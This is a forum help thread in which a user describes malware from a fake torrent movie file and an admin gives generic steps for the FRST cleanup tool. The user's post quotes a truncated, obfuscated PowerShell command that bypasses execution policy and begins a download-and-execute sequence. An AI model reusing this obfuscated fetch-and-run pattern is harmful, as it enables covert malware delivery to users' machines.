RagnarDanneskjold Posted December 24, 2018 ID:1288862 Share Posted December 24, 2018 Hello all! I made the dumb mistake of downloading what i thought was the old grinch movie through a torrent site (we have it on DVD but my daughter scratched it up), and it turns out it wasn't what i thought it was (shocking) It was listed as an AVI file, but when i double clicked it i saw some powershell stuff flash, my windows defender was turned off. I quickly shut off the internet, grabbed malwarebytes form a different computer and installed it on the bad computer. (it's a fairly new computer with not much on it, and also I got windows defender turned back on by deleting some of the registry keys and restarting it....) It scanned and quarantined and removed a handful of things, and i thought i was ok. When i use google my search results pop up then i can see some redirecting at the bottom of the browser to some strange sites, and then my results and whole page looks different. I found a topic close to my issue, but i am still running in to this issue. when i opened up the file (i removed it and deleted it from my recycle bin) here is what was listed in one of the sections.... file:///C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%20-NoPr%20-WINd%201%20-eXEc%20ByP%20-JoIN%20('73R69&88X40j78~101u119%7D45:79~98X106%7D101%7D99z116%7B32&83&121%7D115u116~101&109~46R78%7B101j116%7D46&87:101j98:67R108&105%7D101u110%7B116~41:46u68j111j119~110%7B108R111j97%7B100~83R116u11 It may be longer than that, but i'm not sure, that's all i could see.... Does anyone have any idea on how to fully remove this? I am at a loss..... I also downloaded the farbar recovery tool. So please let me know what i need to run or what to do, i'm all ears! Thanks for any help Link to post Share on other sites More sharing options...
RagnarDanneskjold Posted December 24, 2018 Author ID:1288863 Share Posted December 24, 2018 1st.txtFRST.txtAddition.txt2nd.txt Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted December 26, 2018 Root Admin ID:1289106 Share Posted December 26, 2018 Hello @RagnarDanneskjold and Someone is using this computer to download and steal software. That can be very dangerous to your system and I would highly suggest you take steps to stop this type of behavior from happening on your system. Please download the attached fixlist.txt file and save it to the Desktop.NOTE. It's important that both files, FRST or FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system. Run FRST or FRST64 and press the Fix button just once and wait. If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Please attach or post it to your next reply. Note: If the tool warned you about an outdated version please download and run the updated version. fixlist.txt Thanks, Ron Link to post Share on other sites More sharing options...
Root Admin AdvancedSetup Posted January 8, 2019 Root Admin ID:1291279 Share Posted January 8, 2019 Due to the lack of feedback, this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread. Thanks Link to post Share on other sites More sharing options...
Recommended Posts